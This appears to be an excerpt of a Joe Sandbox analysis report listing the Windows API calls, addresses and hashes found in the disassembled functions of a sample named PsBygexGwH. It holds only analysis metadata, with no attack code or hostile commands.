                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 5b9fc7e31811337aa8cc54a17d9d141b46fd92ed3ba1667125ec8a50300186d7
                                                          • Instruction ID: 3fa05fb885d0cae75c1d0d747d632927adf7e1a91f686b5f1d9dae880dab1d12
                                                          • Opcode Fuzzy Hash: 5b9fc7e31811337aa8cc54a17d9d141b46fd92ed3ba1667125ec8a50300186d7
                                                          • Instruction Fuzzy Hash: 79310970A047186FFF35EB658C04BFA7BA5AF49310F88431BE485561D1C3759B858F92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 001B769A
                                                          • GetWindowRect.USER32(?,?), ref: 001B7710
                                                          • PtInRect.USER32(?,?,001B8B89), ref: 001B7720
                                                          • MessageBeep.USER32(00000000), ref: 001B778C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: f8008b1324ded0c2424fc83b0e782fa5574173fc302e63c62366658243a55526
                                                          • Instruction ID: 75d75ad9a871b1ca421904dcb7d75f8ab3b82919722ae525a944201128993cbc
                                                          • Opcode Fuzzy Hash: f8008b1324ded0c2424fc83b0e782fa5574173fc302e63c62366658243a55526
                                                          • Instruction Fuzzy Hash: F441AB34A09254EFCB11CF59C898EE9B7F4FB98304F1541A8E8159B2A1CB70E981CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 001B16EB
                                                            • Part of subcall function 00183A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00183A57
                                                            • Part of subcall function 00183A3D: GetCurrentThreadId.KERNEL32 ref: 00183A5E
                                                            • Part of subcall function 00183A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001825B3), ref: 00183A65
                                                          • GetCaretPos.USER32(?), ref: 001B16FF
                                                          • ClientToScreen.USER32(00000000,?), ref: 001B174C
                                                          • GetForegroundWindow.USER32 ref: 001B1752
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: f214ed5cdaa12518329146be08944522b6cd75861043d14ce6c33fa772b8353f
                                                          • Instruction ID: 2a58d63606905e293210e9776b62583b38d0c579a1c1da7f17c1926e403eba6d
                                                          • Opcode Fuzzy Hash: f214ed5cdaa12518329146be08944522b6cd75861043d14ce6c33fa772b8353f
                                                          • Instruction Fuzzy Hash: 12317071D00159AFCB04EFA9D881CEEBBF9EF58304B5480A9E415E7651EB319E45CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0018D501
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0018D50F
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0018D52F
                                                          • CloseHandle.KERNEL32(00000000), ref: 0018D5DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: a70587eb2066de1e5c12cabb550358a4ec6a0e1c9c78f70b72819a88a3410908
                                                          • Instruction ID: 2cfda7e032f2ac99e855ba24b25f3186e298fc1221d2ebf8dbf195fbabeca523
                                                          • Opcode Fuzzy Hash: a70587eb2066de1e5c12cabb550358a4ec6a0e1c9c78f70b72819a88a3410908
                                                          • Instruction Fuzzy Hash: D431D4310083009FD300EF54E881AAFBBF8FFA9354F14092DF581971A1EB719A89CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2
                                                          • GetCursorPos.USER32(?), ref: 001B9001
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00177711,?,?,?,?,?), ref: 001B9016
                                                          • GetCursorPos.USER32(?), ref: 001B905E
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00177711,?,?,?), ref: 001B9094
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 4f630d8c9e10769571e348b60b42cd482bd01d32ac09d44af06aede547b005ee
                                                          • Instruction ID: 4990af44fea035401c85262adff5f325f949324778a318f7f0c7260ce814eace
                                                          • Opcode Fuzzy Hash: 4f630d8c9e10769571e348b60b42cd482bd01d32ac09d44af06aede547b005ee
                                                          • Instruction Fuzzy Hash: 4F21AE35600018FFDB259F94CC98EFA7BB9FF8A350F044169FA059B261C3719991DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,001BCB68), ref: 0018D2FB
                                                          • GetLastError.KERNEL32 ref: 0018D30A
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0018D319
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001BCB68), ref: 0018D376
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 1dd5a8ca3c91a62b6f557b2d5774d5f6e67741bad6e4eff5fdefae4d8a4bdefa
                                                          • Instruction ID: e9561f213a96cd4750aa6ba05f9c7f461e242212450dcd61476872d230d7d17c
                                                          • Opcode Fuzzy Hash: 1dd5a8ca3c91a62b6f557b2d5774d5f6e67741bad6e4eff5fdefae4d8a4bdefa
                                                          • Instruction Fuzzy Hash: 5E216DB05093019F8710EF28E8818AEB7E4BF5A364F504A1DF899C72E1D7319A46CF93
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00181014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0018102A
                                                            • Part of subcall function 00181014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00181036
                                                            • Part of subcall function 00181014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00181045
                                                            • Part of subcall function 00181014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0018104C
                                                            • Part of subcall function 00181014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00181062
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001815BE
                                                          • _memcmp.LIBVCRUNTIME ref: 001815E1
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00181617
                                                          • HeapFree.KERNEL32(00000000), ref: 0018161E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: 1ddc9dd9874aad4171ad83d9b5b698d6feeb99f168061fcf287cf8e628f75f3c
                                                          • Instruction ID: 5d617301997da19595d70c420d341a5e4458b0ecd158e80da28418702a420b1d
                                                          • Opcode Fuzzy Hash: 1ddc9dd9874aad4171ad83d9b5b698d6feeb99f168061fcf287cf8e628f75f3c
                                                          • Instruction Fuzzy Hash: 8E212772E00109FFDB10EFA4C945BEEB7B8EF45354F184459E441AB241E770AA46CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001B280A
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001B2824
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001B2832
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001B2840
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: 0f72eca7538f7ab3b951958e75d1aad6f8770d67262477201a23d3ddc181a22d
                                                          • Instruction ID: f5fe7ba24b90cb403f5f00ee8e2db00bdb570d66f73f99e112b5659f9b0e8a1a
                                                          • Opcode Fuzzy Hash: 0f72eca7538f7ab3b951958e75d1aad6f8770d67262477201a23d3ddc181a22d
                                                          • Instruction Fuzzy Hash: E021B331308511AFD7149B24D845FEA7B99AF59324F148258F4268B6E2CB71FC86C7D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00188D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0018790A,?,000000FF,?,00188754,00000000,?,0000001C,?,?), ref: 00188D8C
                                                            • Part of subcall function 00188D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00188DB2
                                                            • Part of subcall function 00188D7D: lstrcmpiW.KERNEL32(00000000,?,0018790A,?,000000FF,?,00188754,00000000,?,0000001C,?,?), ref: 00188DE3
                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00188754,00000000,?,0000001C,?,?,00000000), ref: 00187923
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00187949
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00188754,00000000,?,0000001C,?,?,00000000), ref: 00187984
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: 1118cfa21b0f3f8634eaad1aa94f979596f68bdab895a4b38ebf2405d909646f
                                                          • Instruction ID: 7073e5c3f0b248277faca558e2ddf345ce81d8bbd3b886454fff08907228e582
                                                          • Opcode Fuzzy Hash: 1118cfa21b0f3f8634eaad1aa94f979596f68bdab895a4b38ebf2405d909646f
                                                          • Instruction Fuzzy Hash: 6311293A600342ABCB15BF39C844D7A77A9FF553A4B50412AF842C72A4EF31D901CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001B7D0B
                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 001B7D2A
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001B7D42
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0019B7AD,00000000), ref: 001B7D6B
                                                            • Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID:
                                                          • API String ID: 847901565-0
                                                          • Opcode ID: 05e8a4b19b0fd2b01935ec666a195e08fc0ba56fe69d5a2992dbcb90624d120b
                                                          • Instruction ID: c0d32b85b31f1538c14c623db52a72b55a13e79e2d3757ecb2f221507dfb8232
                                                          • Opcode Fuzzy Hash: 05e8a4b19b0fd2b01935ec666a195e08fc0ba56fe69d5a2992dbcb90624d120b
                                                          • Instruction Fuzzy Hash: 2B11AF31604655AFCB109F68CC04EB63BA5BF853A0F254728F839D72F0E7319990CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 001B56BB
                                                          • _wcslen.LIBCMT ref: 001B56CD
                                                          • _wcslen.LIBCMT ref: 001B56D8
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001B5816
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend_wcslen
                                                          • String ID:
                                                          • API String ID: 455545452-0
                                                          • Opcode ID: 4e680ce028c0ac3c011930d962173992ea45a0009651af753dbe1a3fc1b9b230
                                                          • Instruction ID: c64567e4512687bff6758d110389206c47a534ad382ab3c5d6c90cef1647cbee
                                                          • Opcode Fuzzy Hash: 4e680ce028c0ac3c011930d962173992ea45a0009651af753dbe1a3fc1b9b230
                                                          • Instruction Fuzzy Hash: 9311E275A00608AADF20DF61CC85BFE77BCEF24768F50412AF915D6081EBB0CA80CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1aff9d3118a2207c7f214f66ebd80045e34fa39ca75d3917f65b807cfe3b69e9
                                                          • Instruction ID: e0263df13dd7003d8a704451da44e4f2e982dce683c51ca20a3d495b26a6a42b
                                                          • Opcode Fuzzy Hash: 1aff9d3118a2207c7f214f66ebd80045e34fa39ca75d3917f65b807cfe3b69e9
                                                          • Instruction Fuzzy Hash: 0C01A2B220561AFEF62226B86CC4F67676CDF913BAB310325FD31691D2DB708C484160
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00181A47
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00181A59
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00181A6F
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00181A8A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 05e8c8ac0eac9cdae7de94f698de22482cc346bcc6f1b427ddeee933123a7774
                                                          • Instruction ID: ab65c9477001dc1691b7153afceb2280631399d86d19356e27133b55d649f2ad
                                                          • Opcode Fuzzy Hash: 05e8c8ac0eac9cdae7de94f698de22482cc346bcc6f1b427ddeee933123a7774
                                                          • Instruction Fuzzy Hash: 8F11273A901219FFEB10ABA4C985FADBB79EB08750F200091EA10B7290D7716F51DB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 0018E1FD
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 0018E230
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0018E246
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0018E24D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 2880819207-0
                                                          • Opcode ID: b9c624eb6ad538f602732dc7a0d2cfb26cc3b7e3b4ba698dd8692df5e1c84db1
                                                          • Instruction ID: 433f9707a40091f83f8be662dcf622dd0ec468816237bf99a8bf5f664ade2980
                                                          • Opcode Fuzzy Hash: b9c624eb6ad538f602732dc7a0d2cfb26cc3b7e3b4ba698dd8692df5e1c84db1
                                                          • Instruction Fuzzy Hash: 1411DB76904254FBC701AFA89C05AAF7FEEAB45320F544365F915E3691D7B0CE44CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,?,0014CFF9,00000000,00000004,00000000), ref: 0014D218
                                                          • GetLastError.KERNEL32 ref: 0014D224
                                                          • __dosmaperr.LIBCMT ref: 0014D22B
                                                          • ResumeThread.KERNEL32(00000000), ref: 0014D249
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                          • String ID:
                                                          • API String ID: 173952441-0
                                                          • Opcode ID: 082bd412f2cbb1c7101e167627bad19e26ef5f025cebe72f04b8f44bd91fc711
                                                          • Instruction ID: 6b0902a7bfc21536b44561e60feeb87b9b517e8c9a90dad51d0e61856ecfe8d5
                                                          • Opcode Fuzzy Hash: 082bd412f2cbb1c7101e167627bad19e26ef5f025cebe72f04b8f44bd91fc711
                                                          • Instruction Fuzzy Hash: 7601D236805214BBCF115BA5EC09FAE7AA9EF91731F100329F925961F0CFB0C945C6E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0012604C
                                                          • GetStockObject.GDI32(00000011), ref: 00126060
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0012606A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          • Opcode ID: 44bc037ac586e3753c22b74e1c1d93ac2980af38f3ff03b4ee393f97cd719a6c
                                                          • Instruction ID: f8d9bf2a2f9ccd93206d9670f110630496293d3ec502c6ba41825e90916da3d9
                                                          • Opcode Fuzzy Hash: 44bc037ac586e3753c22b74e1c1d93ac2980af38f3ff03b4ee393f97cd719a6c
                                                          • Instruction Fuzzy Hash: 7511AD72101518FFEF164FA4AC44EEABB6AFF193A4F000201FA0452150C736DCA0EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 00143B56
                                                            • Part of subcall function 00143AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00143AD2
                                                            • Part of subcall function 00143AA3: ___AdjustPointer.LIBCMT ref: 00143AED
                                                          • _UnwindNestedFrames.LIBCMT ref: 00143B6B
